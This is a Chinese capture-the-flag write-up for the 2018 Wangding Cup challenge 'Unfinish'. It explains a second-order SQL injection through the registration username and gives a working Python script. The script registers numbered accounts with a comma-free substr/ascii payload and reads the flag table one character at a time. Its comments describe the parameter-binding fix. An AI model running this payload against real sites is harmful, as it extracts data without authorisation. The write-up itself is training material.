[网鼎杯2018]Unfinish
注册时需要填写邮箱、账户名和密码,登录时只用邮箱和密码;登录成功后页面会显示注册时填写的账户名,说明账户名先被存入数据库、之后又被取出使用,因此推测存在二次注入
过滤了逗号和information,无法使用information_schema,猜测flag在flag表中
上脚本
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time
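# Walkthrough script for the CTF practice challenge named in the write-up.
# `url` is the author's own challenge instance on the training platform.
url = 'http://2a3b6044-d59f-4a4f-ba8c-8c06a64cc813.node3.buuoj.cn/'
m = ''  # characters recovered so far, one per loop iteration

# What the script demonstrates: the username given at registration is shown
# again on index.php after login, and the author infers that it reaches a SQL
# statement without escaping or parameter binding (second-order injection).
# The server-side fix is to bind the username as a parameter in every
# statement that touches it, including ones that reuse values read back from
# the database; the comma / "information" blacklist described in the write-up
# does not stop this.
for i in range(100):
    # "substr(... from N for 1)" is the comma-free spelling of substr(),
    # used because the challenge filters commas.
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    # Each position needs a fresh account, hence the numbered e-mail address.
    email = 'abc{}@qq.com'.format(i)
    register = {'email': email, 'username': payload, 'password': '123456'}
    login = {'email': email, 'password': '123456'}

    # A new session per account; the context manager closes its connections,
    # and the timeout keeps a hung instance from blocking the loop forever.
    with requests.session() as req:
        req.post(url+'register.php', data=register, timeout=10)
        req.post(url+'login.php', data=login, timeout=10)
        r3 = req.post(url+'index.php', timeout=10)

    soup = BeautifulSoup(r3.text, 'html.parser')
    span = soup.span
    shown = span.string if span is not None else None
    shown = shown.strip() if shown is not None else ''
    # The original crashed with AttributeError/ValueError when the page had no
    # <span> or showed a non-numeric name (e.g. registration was rejected).
    if not shown.isdigit():
        print('unexpected username on index.php: {!r}'.format(shown))
        break

    code = int(shown)
    if code == 0:
        # ascii('') is 0: past the end of the value, nothing left to read.
        break
    m += chr(code)
    print(m)
    time.sleep(1)  # pace the requests against the shared practice platform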
payload 左右各加一个 0,是为了闭合账户名两侧的单引号,避免 SQL 语句报错;这里的 + 按数值相加,所以最终显示的账户名就是该位置字符的 ASCII 码